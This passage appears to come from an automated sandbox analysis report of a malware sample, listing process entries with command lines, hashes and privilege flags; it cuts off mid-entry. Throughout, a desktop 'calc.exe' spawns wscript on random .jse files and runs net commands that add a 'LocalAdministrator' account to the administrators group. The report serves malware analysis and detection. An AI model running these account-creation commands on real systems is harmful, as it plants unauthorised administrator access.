Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:44:54
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:44:55
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:44:55
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	15:44:55
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:44:55
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	15:44:55
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	15:44:56
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	15:44:57
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	15:44:57
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	15:44:57
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	15:44:57
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	15:44:58
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	15:44:59
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	15:45:00
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	15:45:01
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" fevGSHOMU4.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	15:45:02
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	15:45:03
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse
Imagebase:	0x570000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:	0x850000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6684c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	15:45:04
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:	0x160000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
